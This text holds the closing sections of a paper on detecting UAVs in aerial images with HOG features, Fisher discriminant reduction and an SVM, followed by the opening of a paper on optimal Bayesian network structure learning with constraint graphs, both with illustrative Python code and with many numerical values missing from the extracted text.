because the support vector machine (svm) proposed by vapnik has the advantages of a simple system structure, global optimization, good generalization, and short training and prediction times [ ], this paper uses the svm as the machine learning tool, in order to learn the sample features quickly and efficiently and to achieve accurate classification. the main idea of the svm is to deal with the linear inseparability of the original space by selecting a polynomial kernel function that maps the data to a high-dimensional space. when the algorithm is used for two-class classification, sample features such as hog are first extracted in the original space and then represented as vectors in the high-dimensional space; in order to minimize the error rate of the two-class classification problem, a hyperplane that separates the two classes in the high-dimensional space must be found. let the sample set be $(x_i,y_i)$, $i=1,\ldots,n$, with $x_i\in\mathbb{R}^{e}$ and class labels $y_i\in\{+1,-1\}$. in the $e$-dimensional space, the linear discriminant function is:

$$g(x)=w\cdot x+b$$

and the classification surface equation is:

$$w\cdot x+b=0$$

after the discriminant function is normalized, the following condition must be satisfied by the two types of samples: $|g(x)|\geq 1$. the classification interval is then $2/\|w\|$, so maximizing the classification interval is equivalent to minimizing $\|w\|$, while all samples must be correctly classified, i.e. the following conditions must be met:

$$y_i\big[(w\cdot x_i)+b\big]-1\geq 0$$

an svm whose inner-product kernel function is $K(x_i,x_j)$ is constructed by maximizing the following objective (which can be understood as finding the extreme value of a quadratic function under linear constraints):

$$Q(a)=\sum_{i=1}^{n}a_i-\frac{1}{2}\sum_{i,j=1}^{n}a_i a_j y_i y_j K(x_i,x_j)$$

with the constraints:

$$\sum_{i=1}^{n}a_i y_i=0,\qquad 0\leq a_i\leq C$$

the resulting support vector machine decision function is:

$$f(x)=\mathrm{sgn}\!\left(\sum_{i=1}^{n}a_i^{*}y_i K(x_i,x)+b^{*}\right)$$

where $b^{*}$ is a constant parameter indicating the classification threshold.

c. sample preparation and classifier training

in this article, a set of positive sample images and a set of negative sample images are selected, and the original positive sample images are used to calculate the aspect ratio of the uav. the images are cropped to a fixed aspect ratio, and the pixels are normalized to a fixed size to avoid any effect of image size on the recognition result. as described in the hog feature section above, each image produces a fixed number of pixel blocks, each pixel block yields a feature vector of fixed dimension, and an image therefore finally produces a hog feature vector of fixed overall dimension.
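the hog computation summarized by the formulas above can be sketched as follows, assuming a grayscale image, square cells, undirected orientation bins and simple l2 block normalization; the cell size, bin count and block size are placeholders, since the concrete values used in the paper are not recoverable from this copy.

```python
import numpy as np

def hog_cell_histograms(img, cell=8, n_bins=9):
    """per-cell orientation histograms with gx(x,y)=I(x+1,y)-I(x-1,y), gy(x,y)=I(x,y+1)-I(x,y-1)."""
    img = img.astype(float)
    gx = np.zeros_like(img)
    gy = np.zeros_like(img)
    gx[:, 1:-1] = img[:, 2:] - img[:, :-2]          # horizontal central difference
    gy[1:-1, :] = img[2:, :] - img[:-2, :]          # vertical central difference
    mag = np.sqrt(gx ** 2 + gy ** 2)                # s(x, y)
    ang = np.rad2deg(np.arctan2(gy, gx)) % 180.0    # undirected orientation in [0, 180)

    h, w = img.shape
    cy, cx = h // cell, w // cell
    hists = np.zeros((cy, cx, n_bins))
    bin_width = 180.0 / n_bins
    for y in range(cy * cell):
        for x in range(cx * cell):
            b = int(ang[y, x] // bin_width) % n_bins
            hists[y // cell, x // cell, b] += mag[y, x]   # vote weighted by gradient magnitude
    return hists

def normalise_blocks(hists, block=2, eps=1e-6):
    """group block x block cells, L2-normalise each block and concatenate into the HOG vector."""
    cy, cx, _ = hists.shape
    feats = []
    for y in range(cy - block + 1):
        for x in range(cx - block + 1):
            v = hists[y:y + block, x:x + block].ravel()
            feats.append(v / (np.linalg.norm(v) + eps))
    return np.concatenate(feats) if feats else np.zeros(0)
```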
the extracted hog vector is used as the input vector of the fisher linear discriminant analysis algorithm, which reduces the dimension of the whole vector. the output dimension is adjustable, and its value is determined according to the recognition efficiency observed in the experiments. the reduced vector is then sent to the svm model, and the resulting svm classifier is used to detect whether a uav is contained in the image under test.

iv. parameter analysis and experimental results

the experiments are carried out with the matlab simulation software on a windows operating system; the same cpu, installed memory and set of test images are used for all runs. the best detection effect is obtained by adjusting the important parameters that affect the experimental results.

a. parameter selection of fld

in the process of extracting the feature vector, the dimension retained by the fisher linear discriminant analysis algorithm is the parameter k of the fld algorithm, and the recognition time changes as this parameter changes. the recognition time as a function of k is shown in figure (the time chart with parameter k changed); the value of k at which the whole algorithm attains the least recognition time is selected.

b. experimental effect of the aerial uav detection algorithm based on the region of interest

experiments show that when the number of pixels in the divided blocks, the svm kernel function type, the segmentation threshold k and the smoothing parameter sigma are set to the selected values, the whole algorithm achieves the best overall recognition effect in terms of accuracy rate and time. the recognition results are shown in figure (identification results, pictures (a)-(d)).

c. comparison with the traditional hog-svm uav detection algorithm

in order to verify the efficiency of the proposed method, its experimental results are compared with those of the hog and svm method based on image segmentation, and the results are summarized in table i. the proposed method achieves a higher accuracy rate, and its average recognition time is shorter than that of the latter method.

table i. comparison results of the test methods
test method | accuracy rate | time
hog-fld+svm | . % | . s
hog+svm | . % | . s

v. conclusion

in this article, a mechanism based on the region of interest is used to obtain candidate regions. in the testing phase, the acquired regions of interest are input into the trained svm classifier, which reduces the recognition time, and in the feature vector extraction phase the dimension reduction of fisher linear discriminant analysis (fld) makes the svm easy to train. comparing the hog-svm detection method based on image segmentation with the region-of-interest-based aerial uav detection algorithm, this paper uses matlab to carry out simulation experiments. the experimental results show that the detection algorithm based on the region of interest is better than the sliding-window method based on image segmentation for detecting uavs in terms of both accuracy and time.
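for orientation, the whole detection pipeline can be sketched end to end with off-the-shelf components. the window size, kernel choice and segmentation parameters below are placeholders, and scikit-image's felzenszwalb and hog routines together with scikit-learn's lda and svc are stand-ins for the authors' own matlab implementation, not a reproduction of it.

```python
import numpy as np
from skimage import color, transform
from skimage.segmentation import felzenszwalb
from skimage.measure import regionprops
from skimage.feature import hog
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.svm import SVC

WINDOW = (64, 64)   # assumed normalised sample size; the paper's exact size is not recoverable here

def hog_of_patch(patch):
    return hog(transform.resize(patch, WINDOW), orientations=9,
               pixels_per_cell=(8, 8), cells_per_block=(2, 2), block_norm="L2-Hys")

def train(pos_imgs, neg_imgs):
    X = np.array([hog_of_patch(im) for im in pos_imgs + neg_imgs])
    y = np.array([1] * len(pos_imgs) + [0] * len(neg_imgs))
    lda = LinearDiscriminantAnalysis().fit(X, y)          # Fisher-style dimension reduction
    svm = SVC(kernel="poly", degree=2).fit(lda.transform(X), y)
    return lda, svm

def detect(img_rgb, lda, svm, scale=200, sigma=0.8, min_size=50):
    gray = color.rgb2gray(img_rgb)
    labels = felzenszwalb(gray, scale=scale, sigma=sigma, min_size=min_size)
    boxes = []
    for r in regionprops(labels + 1):                      # regionprops ignores label 0
        minr, minc, maxr, maxc = r.bbox
        patch = gray[minr:maxr, minc:maxc]
        if patch.size == 0:
            continue
        feat = lda.transform(hog_of_patch(patch)[None, :])
        if svm.predict(feat)[0] == 1:                      # candidate region classified as a uav
            boxes.append((minr, minc, maxr, maxc))
    return boxes
```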
acknowledgment

fund projects: key projects in the industrial field of shaanxi ( ktzdgy - ), scientific research program funded by shaanxi provincial education department ( jk ), national natural science foundation of china ( ), state and provincial joint engineering lab. of advanced network and monitoring control (gsysj ), scientific research program funded by shaanxi provincial education department ( jk ).

references
[ ] barron j, fleet d, beauchemin s, "performance of optical flow techniques," international journal of computer vision, vol. , pp. - , .
[ ] lipton a, fujiyoshi h, patil r, "moving target classification and tracking from real-time video," proc. ieee workshop on applications of computer vision, pp. - , .
[ ] dalal n, triggs b, "histograms of oriented gradients for human detection," proc. ieee conference on computer vision and pattern recognition, pp. - , .
[ ] zhu q, avidan s, yeh m c, cheng k t, "fast human detection using a cascade of histograms of oriented gradients," proc. ieee international conference on computer vision and pattern recognition, .
[ ] suard f, rakotomamonjy a, bensrhair a, et al., "pedestrian detection using infrared images and histograms of oriented gradients," proc. intelligent vehicles symposium, pp. - , .
[ ] felzenszwalb p f, huttenlocher d p, "efficient graph-based image segmentation," international journal of computer vision, vol. , pp. - , .
[ ] humayun a, li f, rehg j m, "rigor: reusing inference in graph cuts for generating object regions," proc. ieee computer vision and pattern recognition, pp. - , .
[ ] vapnik v n, "the nature of statistical learning theory," springer-verlag, new york, pp. - , .
[ ] guo mingwei, zhao yuzhou, xiang junping, et al., "a survey of target detection algorithms based on support vector machine," control and decision, vol. , pp. - , .
[ ] zhang han, he dongjian, "an image segmentation method based on texture information and graph theory," computer science and engineering, vol. , pp. - , .
[ ] zhai jiyou, zhuang yan, "significant detection of boundary prior and adaptive region merging," computer engineering and application, .
[ ] chen shanchao, fu hongguang, wang ying, "application of an improved graph segmentation method in tongue image segmentation," computer engineering and application, vol. , pp. - , .
[ ] yan yu, song wei, "color and texture mixed descriptor image retrieval method," computer science and exploration, pp. - , .
[ ] ye qing, hu changbiao, "an improved image segmentation method based on graph theory," computer and modernization, vol. , pp. - , .
[ ] van de sande k e a, uijlings j r r, gevers t, et al., "segmentation as selective search for object recognition," international conference on computer vision, ieee computer society, pp. - , .
[ ] girshick r, donahue j, darrell t, et al., "rich feature hierarchies for accurate object detection and semantic segmentation," computer science, pp. - , .
[ ] wang ping, wei zheng, cui weihong, "a minimum spanning tree image segmentation criterion based on statistical learning theory," journal of wuhan university (information science edition), vol. , pp. - , .
[ ] belhumeur p, kriegman d, "eigenfaces vs. fisherfaces: recognition using class specific linear projection," ieee transactions on pattern analysis and machine intelligence, vol. , pp. - , .

submitted march , accepted june , published july . corresponding author: jacob m. schreiber, jmschr@cs.washington.edu. academic editor: jingbo wang. additional information and declarations can be found on page . doi . /peerj-cs. copyright schreiber and noble, distributed under creative commons cc-by . open access.

finding the optimal bayesian network given a constraint graph

jacob m. schreiber and william s.
noble department of computer science, university of washington, seattle, wa, united states of america department of genome science, university of washington, seattle, wa, united states of america abstract despite recent algorithmic improvements, learning the optimal structure of a bayesian network from data is typically infeasible past a few dozen variables. fortunately, domain knowledge can frequently be exploited to achieve dramatic computational savings, and in many cases domain knowledge can even make structure learning tractable. several methods have previously been described for representing this type of structural prior knowledge, including global orderings, super-structures, and constraint rules. while super-structures and constraint rules are flexible in terms of what prior knowledge they can encode, they achieve savings in memory and computational time simply by avoiding considering invalid graphs. we introduce the concept of a ‘‘constraint graph’’ as an intuitive method for incorporating rich prior knowledge into the structure learning task. we describe how this graph can be used to reduce the memory cost and computational time required to find the optimal graph subject to the encoded constraints, beyond merely eliminating invalid graphs. in particular, we show that a constraint graph can break the structure learning task into independent subproblems even in the presence of cyclic prior knowledge. these subproblems are well suited to being solved in parallel on a single machine or distributed across many machines without excessive communication cost. subjects artificial intelligence, data mining and machine learning, data science, distributed and parallel computing keywords bayesian network, structure learning, discrete optimization, parallel processing, big data introduction bayesian networks are directed acyclic graphs (dags) in which nodes correspond to random variables and directed edges represent dependencies between these variables. conditional independence between a pair of variables is represented as the lack of an edge between the two corresponding nodes. the parameters of a bayesian network are typically simple to interpret, making such networks highly desirable in a wide variety of application domains that require model transparancy. frequently, one does not know the structure of the bayesian network beforehand, making it necessary to learn the structure directly from data. the most intuitive approach to the task of bayesian network structure learning (bnsl) is ‘‘search-and-score,’’ in which one iterates over all possible dags and chooses the one that optimizes a given scoring function. recent work has described methods that find the optimal bayesian network structure without explicitly considering all possible dags (malone, yuan & hansen, ; yuan, malone & how to cite this article schreiber and and noble ( ), finding the optimal bayesian network given a constraint graph. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:jmschr@cs.washington.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. wu, ; fan, malone & yuan, ; jaakkola et al., ), but these methods are still infeasible for more than a few dozen variables. in practice, a wide variety of heuristics are often employed for larger datasets. 
these algorithms, which include branch-and- bound (suzuki, ), chow-liu trees (chow & liu, ), optimal reinsertion (moore & wong, ), and hill-climbing (tsamardinos, brown & aliferis, ), typically attempt to efficiently identify a structure that captures the majority of important dependencies. in many applications, the search space of possible network structures can be reduced by taking into account domain-specific prior knowledge (gamberoni et al., ; zuo & kita, ; schneiderman, ; zhou & sakane, ). a simple method is to specify an ordering on the variables and require that parents of a variable must precede it in the ordering (cooper & herskovits, ). this representation leads to tractable structure learning because identifying the parent set for each variable can be carried out independently from the other variables. unfortunately, prior knowledge is typically more ambiguous than knowing a full topological ordering and may only exist for some of the variables. a more general approach to handling prior knowledge is to employ a ‘‘super-structure,’’ i.e., an undirected graph that defines the super-set of edges defining valid learned structures, forbidding all others (perrier, imoto & miyano, ). this method has been fairly well studied and can also be used as a heuristic if defined through statistical tests instead of prior knowledge. a natural extension of the undirected super-structure is the directed super-structure (ordyniak & szeider, ), but to our knowledge the only work done on directed super-structures proved that an acyclic directed super-structure is solvable in polynomial time. an alternate, but similar, concept is to define which edges must or cannot exist as a set of rules (campos & ji, ). however, these rule-based techniques do not specify how one would exploit the constraints to reduce the computational time past simply skipping over invalid graphs. we propose the idea of a ‘‘constraint graph’’ as a method for incorporating prior information into the bnsl task. a constraint graph is a directed graph where each node represents a set of variables in the bnsl problem and edges represent which variables are candidate parents for which other variables. the primary advantage of constraint graphs versus other methods is that the structure of the constraint graph can be used to achieve savings in both memory cost and computational time beyond simply eliminating invalid structures. this is done by breaking the problem into independent subproblems even in the presence of cyclic prior knowledge. an example of this cyclic prior knowledge is identifying two groups of variables that can draw parents only from each other, similar to a biparte graph. it can be difficult to identify the best parents for each variable that does not result in a cycle in the learned structure. in addition, constraint graphs are visually more intuitive than a set of written rules while also typically being simpler than a super-structure, because constraint graphs are defined over sets of variables instead of the original variables themselves. this intuition, combined with automatic methods for identifying parallelizable subproblems, makes constraint graphs easy for non-experts to define and use without requiring them to know the details of the structure learning task. this technique is similar to work done by fan, malone & yuan ( ), where the authors describe the same computational gains through the identification of ‘‘potentially optimal schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. group using constraint graph use constraints to guide structure learning a b d de�ne directed super-structure c figure a constraint graph grouping variables. (a) we wish to learn a bayesian network over variables. the variables are colored according to the group that they belong to, which is defined by the user. these variables can either (b) be organized into a directed super structure or (c) grouped into a constraint graph to encode equivalent prior knowledge. both graphs define the superset of edges which can exist, but the constraint graph uses far fewer nodes and edges to encode this knowledge. (d) either technique can then be used to guide the bnsl task to learn the optimal bayesian network given the constraints. parent sets.’’ one difference is that fan et al. define the constraints on individual variables instead of on sets on variables, as this work does. by defining the constraints on sets of variables instead of individual ones, one can identify further computational gains when presented with cyclic prior knowledge. given that two types of graphs will be discussed throughout this paper, the bayesian network we are attempting to learn and the constraint graph, we will use the terminology ‘‘variable’’ exclusively in reference to the bayesian network and ‘‘node’’ exclusively in reference to the constraint graph. constraint graphs a constraint graph is a directed graph in which nodes contain disjoint sets of variables from the bnsl task, and edges indicate which sets of variables can serve as parents to which other sets of variables. a self-loop in the constraint graph indicates that no prior knowledge is known about the relationship between variables in that node, whereas a lack of a self-loop indicates that no variables in that particular node can serve as parents for another variable in that node. thus, the naive bnsl task can be represented as a constraint graph consisting of a single node with a self-loop. a constraint graph can be thought of as a way to group the variables (fig. a), define relationships between these groups (fig. c), and then guide the bnsl task to efficiently find the optimal structure given these constraints (fig. d). in contast, a directed super-structure defines all possible edges that can exist in accordance with the prior knowledge (fig. b). typically, a directed super-structure is far more complicated than the equivalent constraint graph. cyclic prior knowledge can be represented as a simple cycle in the constraint graph, such that the variables in node a draw their parents solely from node b, and b from a. schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. any method for reducing computational time through prior knowledge exploits the ‘‘global parameter independence property’’ of bnsl. briefly, this property states that the optimal parents for a variable are independent of the optimal parents for another variable given that the variables do not form a cycle in the resulting bayesian network. this acyclicity requirement is typically computationally challenging to determine because a cycle can involve more variables than the ones being directly considered, such as a graph which is simply a directed loop over all variables. 
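the notion of a constraint graph defined above can be made concrete with a small sketch: groups of bnsl variables become nodes of a directed graph, and the candidate parents of a variable are read off the incoming edges of its group. the group names, variable names and the networkx representation below are assumptions made for illustration.

```python
import networkx as nx

# hypothetical grouping of BNSL variables into constraint-graph nodes
groups = {
    "A": ["x1", "x2", "x3"],   # self-loop: no prior knowledge among these variables
    "B": ["x4", "x5"],         # these variables may only draw parents from group A
}

cg = nx.DiGraph()
cg.add_nodes_from(groups)
cg.add_edge("A", "A")          # self-loop on A
cg.add_edge("A", "B")          # variables in B draw their parents from A

def allowed_parents(cg, groups, variable):
    """candidate parents of a variable = all variables in groups that point to its group."""
    grp = next(g for g, vs in groups.items() if variable in vs)
    cands = []
    for parent_grp in cg.predecessors(grp):
        cands.extend(v for v in groups[parent_grp] if v != variable)
    return cands

print(allowed_parents(cg, groups, "x4"))   # ['x1', 'x2', 'x3']
print(allowed_parents(cg, groups, "x1"))   # ['x2', 'x3'], via the self-loop on A
```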
however, given an acyclic constraint graph or an acyclic directed super-structure, it is impossible to form a cycle in the resulting structure; hence, the optimal parent set for each variable can be identified independently from all other variables. a convenient property of constraint graphs, and one of their advantages relative to other methods, is that independent subproblems can be found through global parameter independence even in constraint graphs which contain cycles. we describe in ‘solving a component of the constraint graph’ the exact algorithm for finding optimal parent sets for each case one can encounter in a constraint graph. briefly, the constraint graph is first broken up into its strongly connected components (sccs) that identify which variables can have their parent sets found independently from all other variables (‘‘solving a component’’) without the possibility of forming a cycle in the resulting graph. typically these sccs will be single nodes from the constraint graph, but may be comprised of multiple nodes if cyclic prior knowledge is being represented. in the case of an acyclic constraint graph, all sccs will be single nodes, and in fact each variable can be optimized without needing to consider other variables, in line with theoretical results from ordyniak & szeider ( ). in addition to allowing these problems to be solved in parallel, this breakdown suggests a more efficient method of sharding the data in a distributed learning context. specifically, one can assign an entire scc of the constraint graph to a machine, including all columns of data corresponding to the variables in that scc and all variables in nodes which are parents to nodes in the scc. given that all subproblems which involve this shard of the data are contained in this scc of the constraint graph, there will never be duplicate shards and all tasks involving a shard are limited to the same machine. the concept of identifying sccs as independent subproblems has also been described in fan, malone & yuan ( ). it is possible to convert any directed super-structure into a constraint graph and vice- versa though it is far simpler to go from a constraint graph to a directed super-structure. to convert from a directed super-structure to a constraint graph, one must first identify all strongly connected components that are more than a single variable. all variables in a strongly connected component can be put into the same node in a constraint graph that contains a self loop. then, one would tabulate the unique parent and children sets a variable can have. all variables outside of the previously identified strongly connected components with the same parent and children sets can be grouped together into a node in the constraint graph. edges then connect these sets based on the shared parent sets specified for each node. in the situation where a node in the constraint graph can draw parents from only a subset of the variables in a node created by the identification of the strongly connected components, the node must be broken into two nodes that both have self loops and loops connecting to each other to allow for only a subset of those variables schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to serve as a parent for another node. in contrast, to convert from a constraint graph to a directed super-structure one would simply draw, for each node, an edge from all variables in the current node to all variables in the node’s children. 
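continuing the sketch above (the `cg` and `groups` objects are the hypothetical ones defined earlier), the strongly connected components that define independent subproblems, and the expansion of a constraint graph into the equivalent directed super-structure just described, can be written as:

```python
import networkx as nx

def independent_subproblems(cg):
    """each strongly connected component of the constraint graph can be solved on its own."""
    return list(nx.strongly_connected_components(cg))

def to_directed_superstructure(cg, groups):
    """expand a constraint graph into the equivalent directed super-structure over variables."""
    ss = nx.DiGraph()
    for vs in groups.values():
        ss.add_nodes_from(vs)
    for a, b in cg.edges():
        for u in groups[a]:
            for v in groups[b]:
                if u != v:               # no self-edges on individual variables
                    ss.add_edge(u, v)    # u is a candidate parent of v
    return ss
```

the reverse conversion (super-structure to constraint graph) would follow the grouping procedure described in the text and is omitted here.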
we suggest that constraint graphs are the more intuitive method, both due to their simpler representation and the ease of extracting computational benefits from the task.

methods

bayesian network structure learning

although solving a component in a constraint graph can be accomplished by a variety of algorithms, including heuristic algorithms, we assume for this paper that one is using some variant of the exact dynamic programming algorithm proposed by malone, yuan & hansen ( ). we briefly review that algorithm here. the goal of the algorithm is to identify the optimal bayesian network defined over the set of variables without having to repeat any calculations and without having to use excessive memory. this is done by defining additional graphs, the parent graphs and the order graph. we will refer to each node in these graphs as ''entries'' to distinguish them from the constraint graph and the learned bayesian network. a parent graph is defined for each variable and can be described as a lattice, where the entries in some layer i correspond to combinations of all other variables of size i. each entry is connected to the entries in the previous layer that are subsets of that entry, such that an entry $(x_i, x_j)$ would be connected to both $x_i$ and $x_j$. for each entry, the score of the variable is calculated using the parents in the entry and compared to the scores held in the parent entries, recording only the best scoring value and parent set amongst them. these entries then hold the dynamically calculated best parent set and associated score, allowing constant-time lookups later of the best parent set given a set of possible parents. the order graph is structured in the same manner as the parent graphs, except over all variables. in contrast with the parent graphs, it is the edges that store the useful information, in the form of the score associated with adding a given variable to the set of seen variables stored in the entry and the parent set that yields this score. each path from the empty root entry to the leaf entry containing the full set of variables encodes the optimal network given a topological sort of the variables, and the shortest path encodes the optimal network. this data structure reduces the time required to find the optimal bayesian network from $O(n\,2^{n(n-1)})$ in the number of variables to $O(n\,2^{n})$, without the need to keep a large cache of values.

structure learning is flexible with respect to the score function used to identify the optimal graph. there are many score functions, which typically aim to penalize the log likelihood of the data by the complexity of the graph in order to encourage sparser structures. these usually come in the form of bayesian score functions, such as bayesian-dirichlet (heckerman, geiger & chickering, ), or those derived from information theory, such as minimum description length (mdl) (suzuki, ). most score functions decompose across the variables of a bayesian network according to the global parameter independence property, such that the score for a dataset given a model is equal to the product of the scores of each variable given its parents. while constraint graphs remain agnostic to the specific score function used, we assume that mdl is used, as it has several desirable computational benefits. for review, mdl defines the score as follows:

$$MDL(D|M)=P(D|M)-\frac{\log N}{2}\,|B|$$

where $|B|$ is the number of parameters in the network. the term ''minimum description length'' arises from needing $\frac{\log N}{2}$ bits to represent each parameter in the model, making the second term the total number of bits needed to represent the full model.
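a minimal, decomposable version of this score can be sketched as follows, assuming discrete data passed as integer-coded numpy arrays and the $\frac{\log N}{2}$ penalty per parameter reconstructed above; the encoding of parent configurations is an implementation detail chosen for illustration.

```python
import numpy as np
from math import log

def mdl_score(data, child, parents, arity):
    """decomposable MDL score of one variable given a candidate parent set.
    data: dict column -> integer-coded 1-D numpy array; arity: dict column -> number of states."""
    N = len(data[child])
    r = arity[child]
    q = int(np.prod([arity[p] for p in parents])) if parents else 1
    n_params = (r - 1) * q
    # count N_jk: occurrences of child state k under parent configuration j
    counts = np.zeros((q, r))
    if parents:
        strides = np.cumprod([1] + [arity[p] for p in parents[:-1]])
        j = sum(data[p] * s for p, s in zip(parents, strides))   # configuration index
    else:
        j = np.zeros(N, dtype=int)
    np.add.at(counts, (j, data[child]), 1)
    nij = counts.sum(axis=1, keepdims=True)
    with np.errstate(divide="ignore", invalid="ignore"):
        ll = np.where(counts > 0, counts * np.log(counts / nij), 0.0).sum()
    return ll - (log(N) / 2.0) * n_params   # log-likelihood minus the parameter penalty
```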
the mdl score function has the convenient property that a variable cannot have more than $\log\!\left(\frac{2N}{\log N}\right)$ parents given $N$ samples, greatly reducing computational time.

solving a component of the constraint graph

the strongly connected components of a constraint graph can be identified using tarjan's algorithm (tarjan, ). each scc corresponds to a subproblem of the constraint graph and can be solved independently. in many cases the scc will be a single node of the constraint graph, because prior knowledge is typically not cyclic. in general, the sccs of a constraint graph can be solved in any order due to the global parameter independence property. the algorithm for solving an scc of a constraint graph is a straightforward modification of the dynamic programming algorithm described above. specifically, parent graphs are created for each variable in the scc but defined only over the union of possible parents for that variable. consider the case of a simple four-node cycle with no self-loops, such that $w \to x \to y \to z \to w$. a parent graph is defined for each variable in $w \cup x \cup y \cup z$ but only over valid parents; for example, the parent graph for a variable in $x$ would be defined only over the variables in $w$. then, an order graph is defined with the entries that violate the edge structure of the constraint graph filtered out. the first layer of the order graph would be unchanged, with only singletons, but the second layer would prohibit entries with two variables from the same node, because there are no valid orderings in which $x_i$ is a parent of $x_j$, and would prohibit entries in which a variable of $w$ is joined with a variable of $y$. one can identify valid entries by taking the entries of the previous layer and iterating over each variable present, adding all valid parents of that variable which are not already present in the set.

a simple example illustrating the algorithm is a constraint graph made up of a four-node cycle where each node contains only a single variable (fig. a). the parent graphs defined for this case consist of only two entries, the null entry and the entry corresponding to the only valid parent. the first layer of the order graph contains all variables, as before (fig. b). however, once a variable is chosen to start the topological ordering, the order of the remaining variables is fixed because of the constraints, producing a far simpler lattice. because constraint graphs can encode a wide variety of different constraints, the complexity of the task depends on the structure of the constraint graph. broadly, the results from ordyniak & szeider ( ) still hold, namely that acyclic constraint graphs can be solved in quadratic time. as was found in fan, malone & yuan ( ), because each scc can be solved independently, the time complexity for constraint graphs containing a cycle corresponds to the time complexity of the worst-case component.

figure : an example of a constraint graph and the resulting order graph. (a) a constraint graph defined as a cycle over four nodes, each containing a single variable. (b) the resulting order graph during the bnsl task; it is significantly sparser than in the unconstrained task because, after a variable is chosen to start the topological ordering, the remaining variables must be added in the order defined by the cycle.
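the layer-by-layer construction of valid order-graph entries described above can be sketched as follows, using the four-node cycle $w \to x \to y \to z \to w$ with one variable per node as a toy example; the `allowed_parents` mapping is a hypothetical encoding of the constraint-graph edges.

```python
def order_graph_layers(variables, allowed_parents):
    """generate the entries (frozensets of already-placed variables) of each layer of the
    order graph; an entry is grown only by adding valid parents of the variables it contains."""
    layers = [{frozenset()}]
    all_vars = set(variables)
    while layers[-1] and len(next(iter(layers[-1]))) < len(variables):
        nxt = set()
        for entry in layers[-1]:
            if not entry:                        # first layer: any single variable may start
                nxt.update(frozenset([v]) for v in all_vars)
                continue
            for v in entry:                      # extend by valid parents of present variables
                for p in allowed_parents.get(v, ()):
                    if p not in entry:
                        nxt.add(entry | {p})
        layers.append(nxt)
    return layers

# four-node cycle w -> x -> y -> z -> w, one variable per node
allowed = {"x": ["w"], "y": ["x"], "z": ["y"], "w": ["z"]}
for i, layer in enumerate(order_graph_layers(["w", "x", "y", "z"], allowed)):
    print(i, sorted(tuple(sorted(e)) for e in layer))
```

running the example prints four singleton entries in the first layer and only one chain of entries per starting variable afterwards, matching the much simpler lattice described above.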
fortunately, although the complexity of a node engaging in a cycle is still exponential, it is only exponential with respect to the number of variables that node interacts with. adding additional, equally sized nodes to the constraint graph only causes the algorithm to grow linearly in time, and has no additional memory cost if the components are solved sequentially. the algorithm described above has five natural cases, described below.

one node, no parents, no self loop: the variables in this node have no parents, so nothing needs to be done to find the optimal parent sets given the constraints. this naturally takes $O(1)$ time.

one node, no parents, self loop: this is equivalent to exact bnsl with no prior knowledge. in this case, the previously proposed dynamic programming algorithm is used to identify the optimal structure of the subnetwork containing only the variables in this node. this takes $O(n\,2^{n})$ time, where $n$ is the number of variables in the node.

one node, one or more parent nodes, no self loop: in this case it is impossible for a cycle to be formed in the resulting bayesian network regardless of the chosen parent sets, so we can justify solving every variable in this node independently by the global parameter independence property. doing so results in a significant improvement over applying the algorithm naively, because neither the parent graphs nor the order graph need to be explicitly calculated or stored. the optimal parent set can be calculated without dynamic programming because the optimal topological ordering does not need to be discovered, and since no dynamic programming needs to be done, there is no need to store either the parent or order graphs in memory. this takes $O(n\,m^{k})$ time, where $n$ is the number of variables in the node, $m$ is the number of possible parents, and $k$ is the maximum number of parents a variable can have, in this case set by the mdl bound. if $k$ is set to any constant value, then this step requires quadratic time with respect to the number of possible parents and linear time with respect to the number of variables in the node.

one node, one or more parents, self loop: initially, one may think that solving this scc could involve taking the union of all variables from all involved nodes, running exact bnsl over the full set, and simply discarding the parent sets learned for the variables not in the currently considered node. however, in the same way that one should not handle prior knowledge by learning the optimal graph over all variables and discarding the edges that offend the prior knowledge, one should not do so in this case. instead, a modification to the dynamic programming algorithm itself can be made to restrict the parent sets on a variable-by-variable basis. for simplicity, we define the variables in the current node of the constraint graph as $x$ and the union of all variables in the parent nodes of the constraint graph as $y$. we begin by setting up an order graph, as usual defined over $x$. we then add $y$ to each entry in the order graph, such that the root entry is now comprised of $y$ instead of the empty set and the leaf entry is comprised of $x \cup y$ instead of just $x$.
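as a brief aside before the remaining details of the self-loop case, the no-self-loop case above reduces to an independent exhaustive search per variable, which can be sketched as follows; the score function is passed in as a callable (for instance, the mdl sketch given earlier), and the in-degree limit k is the bound discussed above.

```python
from itertools import combinations

def best_parent_set(child, candidates, score_fn, max_indegree):
    """score every parent set of size <= max_indegree drawn from the candidate parents and
    keep the best; valid whenever the child's node has no self-loop, because no choice of
    parents can then create a cycle in the learned network."""
    best = ((), score_fn(child, ()))
    for k in range(1, max_indegree + 1):
        for ps in combinations(candidates, k):
            s = score_fn(child, ps)
            if s > best[1]:
                best = (ps, s)
    return best

# usage sketch with the mdl_score from the earlier snippet (data/arity assumed defined):
# parents, score = best_parent_set("x4", ["x1", "x2", "x3"],
#                                  lambda c, ps: mdl_score(data, c, list(ps), arity),
#                                  max_indegree=3)
```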
because the primary purpose of the order graph is to identify the optimal parent sets that do not form cycles, this addition is intuitive because it is impossible to form a cycle by including any of the variables in y as parents for any of the variables in x. in other words, if one attempted to find the optimal topological ordering over x∪y it would always begin with the variables in y but would be invariant to the ordering of y . parent graphs are then created for all variables in x but are defined over the set of all variables in x∪y , because that is the full set of parents that the variables could be drawn from. this restriction allows the optimal parents for each variable in x to be identified without wasting time considering what the parent set for variables in y should be, or potentially throwing away the optimal graph because of improper edges leading from a variable in y to a variable in x. this step takes o(n n+m) time, where n is the number of variables in the node and m is the number of variables in the parent nodes. this is because we only need to define a parent graph for the variables in the node we are currently considering, but these parent graphs must be defined over all variables in the node plus all the variables in the parent nodes. multiple nodes: the algorithm as presented initially is used to solve an entire component at the same time. results while it is intuitive how a constraint graph provides computational gains by splitting the structure learning task into subproblems, we have thus far only alluded to the idea that prior knowledge can provide efficiencies past that. in this section we examine the computational gains achieved in the three non-trivial cases of the algorithm presented in ‘solving a component of the constraint graph’. acyclic constraint graphs can model the global stock market first, we examine the 